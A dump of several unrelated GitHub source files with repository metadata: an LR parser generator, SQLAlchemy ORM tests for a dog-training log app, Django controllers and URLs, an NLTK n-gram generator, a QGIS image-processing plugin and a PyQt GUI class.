a parser from the grammar \"\"\"\n self.logger.debug(\"Generating parser from {}\".format(self.grammar))\n self.generate_tables()\n p = LrParser(self.grammar, self.action_table, self.goto_table)\n self.logger.debug(\"Parser generated\")\n return p\n\n def gen_canonical_set(self, iis):\n \"\"\" Create all LR1 states \"\"\"\n states = set()\n worklist = []\n transitions = {}\n indici = {}\n\n def addSt(s):\n if s not in states:\n worklist.append(s)\n indici[s] = len(indici)\n states.add(s)\n\n addSt(iis)\n\n while worklist:\n itemset = worklist.pop(0)\n for symbol in self.grammar.symbols:\n nis = self.next_item_set(itemset, symbol)\n if not nis:\n continue\n addSt(nis)\n transitions[(indici[itemset], symbol)] = indici[nis]\n return states, transitions, indici\n\n def set_action(self, state, t, action):\n assert isinstance(action, Action)\n assert isinstance(state, int)\n assert isinstance(t, str)\n key = (state, t)\n if key in self.action_table:\n action2 = self.action_table[key]\n if action != action2:\n if isinstance(action2, Reduce) and isinstance(action, Shift):\n # Automatically resolve and do the shift action!\n # Simple, but almost always what you want!!\n self.action_table[key] = action\n elif isinstance(action2, Shift) and isinstance(action, Reduce):\n pass\n else:\n a1 = str(action)\n a2 = str(action2)\n prod = self.grammar.productions[action.rule]\n prod2 = self.grammar.productions[action2.rule]\n raise ParserGenerationException(\n \"LR conflict {} vs {} ({} vs {})\".format(\n a1, a2, prod, prod2\n )\n )\n else:\n self.action_table[key] = action\n\n def generate_tables(self):\n \"\"\" Generate parsing tables \"\"\"\n\n # If no start symbol set, pick the first one!\n if not self.grammar.start_symbol:\n self.grammar.start_symbol = self.grammar.productions[0].name\n\n # Make grammar normal:\n # self.grammar.rewrite_eps_productions()\n # assert self.grammar.is_normal\n\n self.grammar.check_symbols()\n iis = self.initial_item_set()\n self.logger.debug(\"Initial item set: {} items\".format(len(iis)))\n\n # First generate all item sets by using the nextItemset function:\n states, transitions, indici = self.gen_canonical_set(iis)\n self.logger.debug(\"Number of states: {}\".format(len(states)))\n self.logger.debug(\"Number of transitions: {}\".format(len(transitions)))\n\n # Fill action table:\n for state in states:\n state_nr = indici[state]\n # Detect conflicts:\n for item in state:\n if item.is_shift and item.Next in self.grammar.terminals:\n # Rule 1, a shift item:\n nextstate = transitions[(state_nr, item.Next)]\n self.set_action(state_nr, item.Next, Shift(nextstate))\n if item.is_reduce:\n if (\n item.production.name == self.grammar.start_symbol\n and item.look_ahead == EOF\n ):\n # Rule 3: accept:\n act = Accept(\n self.grammar.productions.index(item.production)\n )\n else:\n # Rule 2, reduce item:\n act = Reduce(\n self.grammar.productions.index(item.production)\n )\n self.set_action(state_nr, item.look_ahead, act)\n\n # Fill the goto table:\n for nt in self.grammar.nonterminals:\n key = (state_nr, nt)\n if key in transitions:\n self.goto_table[key] = transitions[key]\n\n self.logger.debug(\"Goto table: {}\".format(len(self.goto_table)))\n self.logger.debug(\"Action table: {}\".format(len(self.action_table)))\n return self.action_table, self.goto_table\n","repo_name":"windelbouwman/ppci","sub_path":"ppci/lang/tools/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":13519,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"68"} +{"seq_id":"43223731470","text":"from sqlalchemy.orm import sessionmaker,clear_mappers\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import text\nimport sqlalchemy\nfrom datetime import datetime\nimport pytest\n\nfrom src import models\nfrom src.orm import mapper_reg,start_mappers\n\nfrom tests.test_models import Luna, training_log_entry, JC\n\n@pytest.fixture\ndef in_memory_db():\n engine=create_engine(\"sqlite:///:memory:\")\n mapper_reg.metadata.create_all(engine)\n return engine\n\n@pytest.fixture\ndef session(in_memory_db):\n clear_mappers()\n start_mappers()\n yield sessionmaker(bind=in_memory_db)()\n clear_mappers\n\ndef test_can_add_kennel(session):\n session.execute(text(\"\"\" INSERT INTO \"kennel\" (\"kennel_name\") VALUES ('Team Running Husky')\"\"\"))\n\n session.flush()\n expected=[models.Kennel('Team Running Husky')]\n \n assert list(session.query(models.Kennel).all()) == expected\n\ndef test_kennel_mapper_can_add_line(session):\n new_kennel=models.Kennel('Team Running Husky')\n session.add(new_kennel)\n session.commit()\n\n rows=list(session.execute(text(\"\"\" SELECT \"kennel_name\" FROM \"kennel\" \"\"\")))\n assert rows==[(\"Team Running Husky\",)]\n\ndef test_dog_mapper_can_add_line(session,Luna):\n \n # kennel=models.Kennel('Team Running Husky')\n\n # session.add(kennel)\n # luna_kennel=session.query(models.Kennel).all()\n\n #session.add(models.Dog('Luna',datetime(2017,4,18),kennel,'Husky'))\n \n\n session.add(Luna)\n session.commit()\n\n rows=list(session.execute(text(\"\"\" SELECT \"dog_name\", \"kennel_id\" FROM \"dog\" \"\"\")))\n expected=[(Luna.dog_name,1)]\n print(list(session.query(models.Kennel).all()))\n assert rows==expected\n\ndef test_unique_constraint_on_dog_table(session,Luna):\n session.add(Luna)\n session.commit()\n query=text(\"\"\" INSERT INTO \"dog\" (\"dog_name\", \"date_of_birth\", \"breed\", \"kennel_id\") VALUES (:dogname,:dob,:breed,:kennel_id)\"\"\")\n param={\"dogname\": 'Luna','dob':datetime(2017,4,18).date(),'breed':'Husky','kennel_id':1}\n with pytest.raises(sqlalchemy.exc.IntegrityError):\n session.execute(query,param)\n session.flush()\n \n\ndef test_runner_mapper_can_add_line(session,JC):\n \n session.add(JC)\n session.commit()\n\n rows=list(session.execute(text(\"\"\" SELECT \"runner_name\", \"kennel_id\" FROM \"runner\" \"\"\")))\n expected=[(JC.runner_name,1)]\n print(list(session.query(models.Kennel).all()))\n assert rows==expected\n\ndef test_dog_mapper_can_retrive_entry(session,Luna):\n kennel=models.Kennel('Team Running Husky')\n\n session.add(kennel)\n \n query=text(\"\"\" INSERT INTO \"dog\" (\"dog_name\", \"date_of_birth\", \"breed\", \"kennel_id\") VALUES (:dogname,:dob,:breed,:kennel_id)\"\"\")\n param={\"dogname\": 'Luna','dob':datetime(2017,4,18).date(),'breed':'Husky','kennel_id':1}\n session.execute(query,param)\n session.flush()\n \n\n expected=Luna\n \n assert list(session.query(models.Dog).all())[0].date_of_birth == expected.date_of_birth\n assert list(session.query(models.Dog).all())[0].breed == expected.breed\n assert list(session.query(models.Dog).all())[0].dog_name == expected.dog_name\n assert list(session.query(models.Dog).all())[0].kennel_name == expected.kennel_name\n\n\ndef test_can_add_training_entry(session):\n kennel=models.Kennel('Team Running Husky')\n\n session.add(kennel)\n TRH_kennel=session.query(models.Kennel).all()[0]\n\n luna=models.Dog('Luna',datetime(2017,4,18),TRH_kennel,'Husky')\n JC= models.Runner('JC', TRH_kennel)\n bolt=models.Dog('Bolt',datetime(2018,6,12),TRH_kennel,'Husky')\n \n #session.add(models.Dog('Luna',datetime(2017,4,18),kennel,'Husky'))\n \n training_entry= models.Training_Log(datetime.now(), 20,77, luna,None,\"Canicross\",JC,\\\n \"Christie\", 2.4, 3, pace=\"0:03:20\")\n\n print(training_entry.dog1_name.dog_name)\n \n session.add(training_entry)\n session.commit()\n\n query=text(\"\"\" SELECT \"dog1_id\", \"dog2_id\", \"runner_id\", \"sport\",\"weather_id\",\"speed\", \"pace\" FROM \"training_log\" \"\"\")\n \n rows=list(session.execute(query))\n print(rows)\n expected=[(luna.id, bolt.id, JC.id, \"Canicross\", 1, 18, \"0:03:20\"),]\n assert rows==expected\n\ndef test_dog_weight_entry_mapper_can_add_line(session, Luna):\n # session.add(Luna)\n # session.flush()\n luna=models.Dog('Luna',datetime(2017,4,18),models.Kennel('Team Running Husky'),'Husky')\n \n weight_entry=models.Dog_Weight(luna, datetime.now().strftime('%Y/%m/%d'), 35)\n\n session.add(weight_entry)\n session.commit()\n\n query=text(\"\"\" SELECT \"dog_id\", \"dog_age\", \"weight\" FROM \"weight_entry\" \"\"\")\n \n rows=list(session.execute(query).all())\n print(rows)\n expected=[(luna.id, luna.age, 35.0),]\n assert rows==expected\n\ndef test_log_entry_creates_weather_entry(session):\n\n kennel=models.Kennel('Team Running Husky')\n\n session.add(kennel)\n TRH_kennel=session.query(models.Kennel).all()[0]\n\n luna=models.Dog('Luna',datetime(2017,4,18),TRH_kennel,'Husky')\n JC= models.Runner('JC', TRH_kennel)\n bolt=models.Dog('Bolt',datetime(2018,6,12),TRH_kennel,'Husky')\n \n #session.add(models.Dog('Luna',datetime(2017,4,18),kennel,'Husky'))\n \n training_entry= models.Training_Log(datetime.now(), 20,77, luna,None,\"Canicross\",JC,\\\n \"Christie\", 2.4, 3, pace=\"0:03:20\")\n\n \n session.add(training_entry)\n session.commit()\n\n print(list(session.query(models.Weather_Entry).all())[0].timestamp)\n \n \n\n \n\n","repo_name":"JCOno-dit-Biot/training_log_app","sub_path":"tests/test_orm.py","file_name":"test_orm.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11275378881","text":"\nfrom django.conf import settings\nfrom core.lib.controller import Controller, login_required\nfrom core.models.ui import UI\n\n\nclass UIController():\n actions = ['index', 'create', 'search', 'delete_all']\n\n def router(req, **kwargs):\n return Controller.route(UIController, UIController.actions, req, kwargs)\n\n def index(req):\n \"\"\" List the all UIs by type \"\"\"\n type = req.GET.get('type');\n uis = UI.objects.filter(**{'type':type}).order_by('name').values()\n return Controller.render_json({'results':list(uis), \"total\": len(uis)})\n\n def create(req):\n id = False\n if req.method == 'POST':\n nw = UI.objects.create(**{'name':req.POST.get('name'),\n 'type':req.POST.get('type'),\n 'markup':req.POST.get('markup'),\n 'group':req.POST.get('group'),\n })\n id = nw.id;\n nw.markup = nw.markup.format(nw.id)\n nw.save()\n return Controller.render_json({'success':True, 'id':id, })\n\n def search(req):\n \"\"\" List search results \"\"\"\n f = {'name__icontains':req.GET.get('keyword', '')}\n locs = Section.objects.filter(**f).order_by('name').values('id', 'name')[:100]\n return Section.render_json({'sections':list(secs), \"total\": len(secs)})\n\n def delete_all(req):\n UI.objects.filter(**{}).delete()\n return Controller.render_json({'action':'delete_all'})\n","repo_name":"scottyadean/picbiz","sub_path":"picbiz/core/controllers/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16873632087","text":"import nltk\r\nimport re\r\nimport pprint as pp\r\nimport numpy as np\r\nimport json\r\n\r\ndictfilt = lambda x, y: dict([ (i,x[i]) for i in x if i in set(y) ])\r\n\r\ndef N_Grams(text, n):\r\n \r\n ngrams, n1gram = [], []\r\n for txt in text:\r\n for i in range(0,n-1):\r\n txt = ' ' + txt\r\n txt = txt + ' '\r\n ngrams += list(nltk.ngrams(txt.split(), n))\r\n n1gram += list(nltk.ngrams(txt.split(), n - 1))\r\n #pp.pprint(ngrams)\r\n #pp.pprint(n1gram)\r\n ngram_freq = {x[0]: x[1] for x in [x for x in nltk.FreqDist(ngrams).items()]}\r\n #print(ngram_freq)\r\n \r\n n1gram_freq = {x[0]: x[1] for x in [x for x in nltk.FreqDist(n1gram).items()]}\r\n #print(n1gram_freq)\r\n \r\n ngram_prob = {}\r\n for k,v in ngram_freq.items():\r\n ngram = k\r\n if ngram[:-1] in n1gram:\r\n prob = v / n1gram_freq[ngram[:-1]]\r\n ngram_prob[k] = prob\r\n \r\n return ngram_prob\r\n\r\ndef generate_text(prob, prompt, n):\r\n\r\n if len(prompt.split(' ')) < (n - 1):\r\n return 'TEXT CANNOT BE GENERATED'\r\n #pp.pprint(prob)\r\n #print(\"prompt:\", prompt.split(' '))\r\n text = ['']\r\n text.extend(prompt.split(' '))\r\n #print(\"text:\", text)\r\n pref_tup = tuple(text[-(n-1):]) \r\n cnt = 0\r\n while (pref_tup[-1] != '') and (cnt < 3):\r\n #print(\"Pref Tuple:\", pref_tup)\r\n #print([tup[:-1] for tup in prob.keys()])\r\n keys = [tup for tup in prob.keys() if pref_tup == tup[:-1]]\r\n if keys == None:\r\n return \" \".join(text[1:])\r\n #print(\"keys:\",keys)\r\n prob_keys = dictfilt(prob, keys)\r\n #print(prob_keys)\r\n max_key = max(prob_keys, key=prob_keys.get)[-1]\r\n #print(\"word:\", max_key)\r\n pref_tup = list(pref_tup)\r\n pref_tup.append(max_key)\r\n pref_tup = tuple(pref_tup[1:])\r\n text.append(max_key)\r\n cnt += 1\r\n #text.append(word)\r\n #print(text[1:])\r\n pred = ' '.join(text[1:])\r\n pred = pred.replace(\"\", \"\")\r\n return pred\r\n\r\ndef preprocess(txt):\r\n\r\n txt = re.sub(r'\\n{2,}|^\\n', '', txt)\r\n txt = re.sub(r'^\\d+\\s|\\s\\d+\\s|\\s\\d+$', ' ', txt)\r\n txt = re.sub(r'\\.', '', txt)\r\n txt = re.sub(r',', '', txt)\r\n return txt\r\n \r\ndef save_model(dict, filename=\"ngram-model.json\"):\r\n dict = {','.join(list(k)):v for k,v in dict.items()}\r\n with open(filename, \"w\") as outfile:\r\n json.dump(dict, outfile)\r\n\r\ndef open_model(filename=\"ngram-model.json\"):\r\n with open(filename, \"r\") as f:\r\n data = json.load(f)\r\n data = {tuple(k.split(',')):v for k,v in data.items()}\r\n return data\r\n\r\nif __name__ == \"__main__\":\r\n\r\n text = ['Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \r\n 'Sed massa felis, fermentum et tortor sit amet, semper imperdiet orci.']\r\n text = [preprocess(x) for x in text]\r\n n = 2\r\n prob = N_Grams(text, n)\r\n #print(prob)\r\n save_model(prob)\r\n prob = open_model()\r\n sent = generate_text(prob, 'lorem ipsum dolor', n)\r\n sent = re.sub(r'\\,|\\.', '', sent)\r\n print(sent)\r\n","repo_name":"rambabu264/NLP_n-gram_model","sub_path":"N_Gram/N_Gram.py","file_name":"N_Gram.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34078976991","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n path('', views.index, name='movies_list'),\n path('movies/', views.details, name='movie_details'),\n path('movies/like', views.watchlist, name='movie_like'),\n path('movies/favorites/',views.favorite,name='movie_favorites'),\n path('watchlist/', views.user_watchlist,name='watch_list'),\n]","repo_name":"jkimuli/filmdeck","sub_path":"movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1270644732","text":"# Create your tests here.\n\n\n# class TestSomeCase(TestCase):\n# def test_my_view(self):\n# client = Client()\n# response = client.get('/test/')\n# self.assertEqual(response.content.decode(), \"Test done!\")\n\nimport pytest\n\nfrom logistic.models import Product\n\n\n@pytest.mark.django_db # give test access to database\ndef test_product_create():\n # Create dummy data\n product = Product.objects.create(\n title=\"new product\",\n description=\"The rely new product for test\", )\n # Assert the dummy data saved as expected\n assert product.title == \"new product\"\n assert product.description == \"The rely new product for test\"\n","repo_name":"sergeMMikh/hw_17.10.2022","sub_path":"logistic/tests_logistic.py","file_name":"tests_logistic.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2189005420","text":"from PyQt4.QtCore import*\nfrom PyQt4.QtGui import*\nfrom qgis.core import*\nfrom qgis.gui import*\n# Initialize Qt resources from file resources.py\nimport resources\n# Import the code for the dialog\nfrom Imagem_dialog import ImagemDialog\nimport os.path\nimport qgis.utils\nimport glob\nimport os.path\nimport numpy as np\nimport os\nimport math\nfrom osgeo import gdal\nimport osr\nimport pyproj\nimport processing\nclass Imagem:\n \"\"\"QGIS Plugin Implementation.\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgisInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'Imagem_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n\n self.dlg = ImagemDialog()\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u'&IMAGE PROCESSOR')\n # TODO: We are going to let the user set this up in a future iteration\n self.toolbar = self.iface.addToolBar(u'Imagem')\n self.toolbar.setObjectName(u'Imagem')\n\n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('Imagem', message)\n\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n # Create the dialog (after translation) and keep reference\n self.dlg = ImagemDialog()\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n icon_path = ':/plugins/Imagem/icon.png'\n self.add_action(\n icon_path,\n text=self.tr(u'PDI'),\n callback=self.run,\n parent=self.iface.mainWindow())\n self.dlg.caminho.clear()\n self.dlg.ponto2.clear()\n self.dlg.pushButton.clicked.connect(self.selecionar_saida) #conectando o botão para salvar o ponto1\n self.dlg.pushButton_2.clicked.connect(self.salvar_ponto2) #conectando o botão para salvar o ponto 2.\n\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginMenu(\n self.tr(u'&IMAGE PROCESSOR'),\n action)\n self.iface.removeToolBarIcon(action)\n # remove the toolbar\n del self.toolbar\n\n #Abaixo a função para que s eposso salvar os vetores de ponto 1 e 2.\n def selecionar_saida(self):\n arquivoCaminho = QFileDialog.getSaveFileName(self.dlg, \"Salvar o arquivo em: \", \"\", \"*.shp\")\n self.dlg.caminho.setText(arquivoCaminho)\n\n def salvar_ponto2(self):\n ponto2_caminho = QFileDialog.getSaveFileName(self.dlg, \"Salvar o arquivo em: \", \"\", \"*.shp\")\n self.dlg.ponto2.setText(ponto2_caminho)\n\n\n def run(self):\n \"\"\"Run method that performs all the real work\"\"\"\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n\n self.dlg.show()\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n self.dlg.show()\n #atribuir função as janelas do qt4\n imagens = self.dlg.mMapLayerComboBox.currentLayer()\n latitude= self.dlg.lineEdit.text() #inserir valor da latitude\n longitude= self.dlg.lineEdit_2.text() #inserir valor da longitude\n latitude2= self.dlg.lineEdit_3.text() #inserir valor da latitude2\n longitude2= self.dlg.lineEdit_4.text() #inserir valor da longitude2\n projecao= self.dlg.lineEdit_5.text() #inserir o EPSG da projeção\n localSalvo = self.dlg.caminho.text() #inserir o caminho para salvar ponto 1\n localSalvo2 = self.dlg.ponto2.text() #inserir o caminho para salvar o ponto 2.\n latitudedist=float(latitude) #transformando em float\n longitudedist=float(longitude) #transformando em float\n latitude2dist=float(latitude2) #transformando em float\n longitude2dist=float(longitude2) #transformando em float\n\n #Cálculo de distância euclidiana entre os 2 pontos coletados na imagem em .m\n\n a= np.array((latitudedist,longitudedist))\n b = np.array((latitude2dist, longitude2dist))\n dist = np.linalg.norm(a-b)\n self.dlg.distancia.setValue(dist)\n\n #configurando o QSlider para definir valor do contraste\n\n self.dlg.sl.setMinimum(0)\n self.dlg.sl.setMaximum(255)\n contraste = self.dlg.sl.value()\n\n #abaixo o código para ler a imagem no maplayer e adicionar o contraste e em seguida exibir no Qgis\n #selecionada= QgsMapLayerRegistry.instance().mapLayersByName(imagens)[0]\n contrastFilter=QgsBrightnessContrastFilter()\n contrastFilter.setContrast(float(contraste))\n imagens.pipe().set(contrastFilter)\n imagens.triggerRepaint()\n\n #modificando o nome do layer após alteração\n if contraste is not 0:\n for imagens in QgsMapLayerRegistry.instance().mapLayers().values():\n imagens.setLayerName('contraste_mod')\n else:\n imagens.setLayerName('Original')\n QgsMapLayerRegistry.instance().addMapLayer(imagens)\n\n # Verificando a extensão da imagem em X e Y\n\n if imagens is not None:\n\n xsize = imagens.rasterUnitsPerPixelX()\n ysize = imagens.rasterUnitsPerPixelY()\n\n extent = imagens.extent()\n\n # obtendo as cordenadas de tamanho da imagem na correspondente unidadee desta.\n ymax = extent.yMaximum()\n ymin=extent.yMinimum()\n xmax = extent.xMaximum()\n xmin = extent.xMinimum()\n self.dlg.xmax.setText(str(xmax))\n self.dlg.xmin.setText(str(xmin))\n self.dlg.ymax.setText(str(ymax))\n self.dlg.ymin.setText(str(ymin))\n\n\n #transformando as coordenadas do ponto 1 em coordenada linha x coluna\n\n t= ymax - longitudedist\n v= latitudedist - xmin\n\n row = int((t/ ysize) + 1)\n column = int((v / xsize) + 1)\n self.dlg.linhas.setText(str(row))\n self.dlg.colunas.setText(str(column))\n\n #transformando as coordenadas do ponto 2 em coordenada linha x coluna\n\n t1= ymax - longitude2dist\n v1= latitude2dist - xmin\n\n row = int((t1/ ysize) + 1)\n column = int((v1/ xsize) + 1)\n self.dlg.linhas2.setText(str(row))\n self.dlg.colunas2.setText(str(column))\n\n\n #abaixo será criado o ponto 1\n camada = QgsVectorLayer('Point?crs=epsg:'+projecao, 'PONTO 1' , 'memory')\n pr = camada.dataProvider()\n ponto = QgsPoint(float(latitude),float(longitude))\n pt= QgsFeature()\n pt.setGeometry(QgsGeometry.fromPoint(ponto))\n pr.addFeatures([pt])\n camada.updateExtents()\n QgsMapLayerRegistry.instance().addMapLayers([camada])\n properties = {'size': '2.0', 'red': '255,0,0'}\n symbol_layer = QgsSimpleMarkerSymbolLayerV2.create(properties)\n camada.rendererV2().symbols()[0].changeSymbolLayer(0, symbol_layer)\n canvas = self.iface.mapCanvas()\n extent = camada.extent()\n canvas.setExtent(extent)\n\n #abaixo será criado o ponto 2\n camada2 = QgsVectorLayer('Point?crs=epsg:'+projecao, 'PONTO 2' , 'memory')\n pr2 = camada2.dataProvider()\n ponto2 = QgsPoint(float(latitude2),float(longitude2))\n pt2= QgsFeature()\n pt2.setGeometry(QgsGeometry.fromPoint(ponto2))\n pr2.addFeatures([pt2])\n camada2.updateExtents()\n QgsMapLayerRegistry.instance().addMapLayers([camada2])\n properties2 = {'size': '2.0', 'green': '0,255,0'}\n symbol2_layer = QgsSimpleMarkerSymbolLayerV2.create(properties2)\n camada2.rendererV2().symbols()[0].changeSymbolLayer(0, symbol2_layer)\n canvas2 = self.iface.mapCanvas()\n extent2 = camada2.extent()\n canvas.setExtent(extent2)\n\n #recrevendo todos arquivos vetores gerados para serem salvos em uma pasta selecionada.\n\n QgsVectorFileWriter.writeAsVectorFormat(camada, localSalvo, \"utf_8_encode\", camada.crs(), \"ESRI Shapefile\")\n pnt_layer = QgsVectorLayer(localSalvo, \"Ponto B2E\", \"ogr\")\n QgsVectorFileWriter.writeAsVectorFormat(camada2, localSalvo2, \"utf_8_encode\", camada2.crs(), \"ESRI Shapefile\")\n pnt_layer2 = QgsVectorLayer(localSalvo2, \"Ponto B2E\", \"ogr\")\n","repo_name":"joycerdsilva/imageprocessor","sub_path":"Imagem.py","file_name":"Imagem.py","file_ext":"py","file_size_in_byte":11781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4749783253","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui, QtCore\nimport sys, copy, traceback\nfrom gtdev.helper_methods import *\n\n\n## control class for the interface between GUI and calculation\nclass GUIcalcIO(QtGui.QWidget):\n ## @var cobj\n # master object for storing the component,\n # can be any instance of an AbstractTurbo class\n # @see AbstractTurbo\n cobj = 0\n\n ## @var tableList\n # storage for all input/output tables,\n # this is a list of lists of QTableWidget\n # @code\n # tableList[0]: tables for the parent component\n # tableList[0][0]: table for the thermodynamic input data\n # tableList[0][1]: table for the thermodynamic output data\n # tableList[0][2]: table for the aerodynamic input data\n # tableList[0][3]: table for the aerodynamic output data\n # tableList[1]: tables for the 1st sub-component\n # tableList[1][:]: tables for the thermo- & aerodynamic in/output data\n # tableList[2]: tables for the 2nd sub-component\n # ...\n # @endcode\n tableList = []\n\n ## Constructor\n #\n # initialize the GUI and all associated widgets\n def __init__(self, cobj_, parent_=None):\n QtGui.QWidget.__init__(self, parent_)\n\n # the man tab widget usually is the parent\n # (but this could be any Qt widget)\n self.parent = parent_\n\n # store the reference for the component\n # @todo check type of cobj_\n self.cobj = cobj_\n\n # widget layout\n self.calcThermoButton = QtGui.QPushButton(\"Calculate Thermodynamics\")\n self.calcAeroButton = QtGui.QPushButton(\"Calculate Aerodynamics\")\n self.calcAeroButton.setEnabled(0)\n\n self.connect(self.calcThermoButton, QtCore.SIGNAL(\"clicked()\"), self.calcThermodynamics)\n self.connect(self.calcAeroButton, QtCore.SIGNAL(\"clicked()\"), self.calcAerodynamics)\n\n self.thermoDone = False\n self.aeroDone = False\n\n # additional buttons if embedded within tab widget\n if self.parentWidget() != 0:\n self.exportSelectedButton = QtGui.QPushButton(\"Export Selected Component\")\n self.closeTabButton = QtGui.QPushButton(\"Close Tab\")\n\n self.connect(self.exportSelectedButton, QtCore.SIGNAL(\"clicked()\"), self.exportSelected)\n self.connect(self.closeTabButton, QtCore.SIGNAL(\"clicked()\"), self.parentWidget().closeTab)\n\n # component tree\n self.tree = QtGui.QTreeWidget()\n self.initTree()\n self.connect(self.tree, QtCore.SIGNAL('itemSelectionChanged()'), self.getActiveWidget)\n\n # widget stack\n self.initIOList()\n\n # error handling\n self.calcErr = QtGui.QErrorMessage()\n\n # layout\n leftbox = QtGui.QWidget()\n vboxtree = QtGui.QVBoxLayout()\n vboxtree.addWidget(self.tree)\n vboxtree.addWidget(self.calcThermoButton)\n vboxtree.addWidget(self.calcAeroButton)\n if self.parentWidget() != 0:\n vboxtree.addWidget(self.exportSelectedButton)\n vboxtree.addWidget(self.closeTabButton)\n leftbox.setLayout(vboxtree)\n\n splitter = QtGui.QSplitter()\n splitter.addWidget(leftbox)\n splitter.addWidget(self.ioWidgetStack)\n\n vbox0 = QtGui.QVBoxLayout()\n vbox0.addWidget(splitter)\n\n self.setLayout(vbox0)\n\n ## initialize structure tree\n #\n # build the structure tree based on the current cobj\n # the current component (cobj) will be the master node,\n # to which a list of corresponding sub-components as children (if present) is appended\n def initTree(self):\n if self.cobj == None:\n self.getMasterComponent()\n\n self.tree = QtGui.QTreeWidget()\n self.tree.setColumnCount(2)\n self.tree.setHeaderLabels([\"Component Name\", \"Type\"])\n\n masterTreeItem = QtGui.QTreeWidgetItem()\n masterTreeItem.setText(0, self.cobj.identification)\n masterTreeItem.setText(1, str(self.cobj))\n subTreeItems = []\n for elem in self.cobj.subcomponentList:\n this = QtGui.QTreeWidgetItem()\n this.setText(0, elem[1].identification)\n this.setText(1, str(elem[1]))\n subTreeItems.append(this)\n masterTreeItem.addChild(this)\n\n self.tree.addTopLevelItem(masterTreeItem)\n self.tree.setColumnWidth(0, 250)\n self.tree.setColumnWidth(1, 400)\n self.tree.expandAll()\n\n ## initialize component stack\n #\n # build the component stack based on the current cobj\n # the current component (cobj) will correspond to the first widget,\n # thereafter a widget for each corresponding sub-component (if present) is appended\n #\n # each widget contains the necessary tables for the corresponding (sub-)component\n def initIOList(self):\n # note: ordering of widgets (components) is important here!\n del self.tableList[:]\n\n self.ioWidgetStack = QtGui.QStackedWidget()\n\n # add widget for parent component to widget stack\n self.ioWidgetStack.addWidget(self.getParamIOWidget(self.cobj))\n\n # add widgets for sub-components to widget stack\n for elem in self.cobj.subcomponentList:\n self.ioWidgetStack.addWidget(self.getParamIOWidget(elem[1]))\n\n # update all tables\n self.updateTables()\n\n ## action for selecting a new component in the structure tree\n #\n # this function is called whenever the user selects a new (sub-)component in the structure tree\n # in consequence, the corresponding widget in the widget stack is selected and sent forward\n def getActiveWidget(self):\n\n # try to grab tab index if the current widget on the stack is a QTabWidget\n if isinstance(self.ioWidgetStack.currentWidget(), QtGui.QTabWidget):\n tab_index = self.ioWidgetStack.currentWidget().currentIndex()\n 